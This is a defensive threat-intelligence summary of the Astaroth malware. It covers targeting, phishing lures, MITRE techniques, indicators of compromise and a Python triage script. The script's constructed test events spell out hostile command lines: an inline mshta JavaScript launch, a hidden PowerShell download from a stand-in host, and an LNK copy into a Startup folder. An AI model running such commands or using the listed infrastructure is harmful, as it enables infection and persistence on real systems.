Astaroth, also known as Guildma, is a sophisticated malware family that has evolved since its emergence in 2018, predominantly affecting systems in Latin America, especially Brazil. The malware employs advanced techniques to evade detection and delivers its payload through phishing. It targets multiple industries, with a significant focus on manufacturing, IT, and financial services. Recent innovations in its execution and evasion strategies highlight the constant adaptation of its authors.
Affected: Brazil, Mexico, Argentina, Manufacturing, IT, Financial Services, Health Care
Key points:
- Astaroth malware targets primarily Latin America, with 91% of affected systems in Brazil.
- It leverages phishing schemes with themes relevant to its targeted audience, such as tax declarations and accounting documents.
- The initial infection method utilizes MSHTA to execute JavaScript for further malicious downloads.
- Employs evasion methods against security technologies, such as anti-debugging and geolocation checks.
- Recent campaigns have utilized spoofed DocuSign emails to trick users.
- Complex infection chains involve multiple stages of downloading and executing malicious files.
- The malware creates persistent backdoors on infected systems through LNK files in Startup directories.
- Utilizes multiple layers of obfuscation and string encryption to hinder analysis.
- Targets include various industries, with manufacturing being the most affected sector (27%).
- Deployment and infection processes are increasingly sophisticated, indicating ongoing evolution.
MITRE Techniques:
- T1203: Exploitation for Client Execution – Astaroth employs MSHTA to execute malicious JavaScript code.
- T1071: Application Layer Protocol – The payload uses HTTP/HTTPS for command and control communications.
- T1105: Ingress Tool Transfer – Downloads malicious scripts from remote servers based on geolocation conditions.
- T1059: Command and Scripting Interpreter – Utilizes PowerShell to execute commands and download the payload.
- T1027: Obfuscated Files or Information – Implements various techniques, including encoding and script obfuscation, to conceal its activities.
- T1497: Virtualization/Sandbox Evasion – Checks for specific processes and volume serial numbers to detect sandbox environments.
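The chain summarized above (MSHTA launching inline JavaScript, a PowerShell download spawned from MSHTA, and an LNK dropped into a Startup folder) can be turned into simple process-event triage logic. The following is an added example written for this summary, not code from Acronis or from the malware; the event records are constructed to resemble process-creation telemetry and are not real data.

```python
import re

# Constructed process-creation events: (parent image, image path, command line).
# Loosely modelled on a Sysmon Event ID 1 export; none of these are real telemetry.
EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\mshta.exe",
     r'mshta.exe javascript:eval(unescape("%73%74%61%67%65"))'),
    ("mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -w hidden -c Invoke-WebRequest http://example.invalid/stage2 -OutFile C:\Users\Public\s.bin"),
    ("explorer.exe", r"C:\Program Files\App\app.exe", "app.exe --update"),
    ("powershell.exe", r"C:\Windows\System32\cmd.exe",
     r'cmd /c copy C:\Users\Public\sync.lnk "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sync.lnk"'),
    ("explorer.exe", r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\Vendor\help.hta"),
]

# mshta invoked with an inline script protocol or a remote URL (not a local .hta file)
MSHTA_INLINE = re.compile(r"mshta(\.exe)?\s+(javascript:|vbscript:|https?://)", re.I)
# common PowerShell download primitives
PS_DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|net\.webclient)", re.I)
# any .lnk written under a user's or the machine's Startup folder
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk", re.I)


def score_event(parent, image, cmdline):
    """Return the list of finding tags that apply to one process-creation event."""
    findings = []
    img = image.lower().rsplit("\\", 1)[-1]  # file name only
    if img == "mshta.exe" and MSHTA_INLINE.search(cmdline):
        findings.append("mshta_inline_script")
    if img == "powershell.exe" and parent.lower() == "mshta.exe" and PS_DOWNLOAD.search(cmdline):
        findings.append("powershell_download_from_mshta")
    if STARTUP_LNK.search(cmdline):
        findings.append("startup_lnk_write")
    return findings


def triage(events):
    """Map event index -> findings, keeping only events that matched something."""
    result = {}
    for i, event in enumerate(events):
        findings = score_event(*event)
        if findings:
            result[i] = findings
    return result


if __name__ == "__main__":
    for idx, tags in triage(EVENTS).items():
        print(idx, EVENTS[idx][1], tags)
```

The benign cases (a vendor updater and mshta opening a local .hta) produce no findings, so an alert can be raised on any non-empty result rather than on every mshta or PowerShell launch.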
Indicators of Compromise:
- MD5: 62acdb0765cf0a73bd4fedf7f11c3512
- MD5: 86517ea3d3ae9767f654bd417e990b1f
- MD5: dece8b727fab19363beb8624a98b4c98
- URL: tcp.sa.ngrok.io:20262
- URL: hxxps://i.postimg.cc/fRnxLLCy/destacada-paisagens2.jpg
Full Story: https://www.acronis.com/en-us/cyber-protection-center/posts/astaroth-unleashed/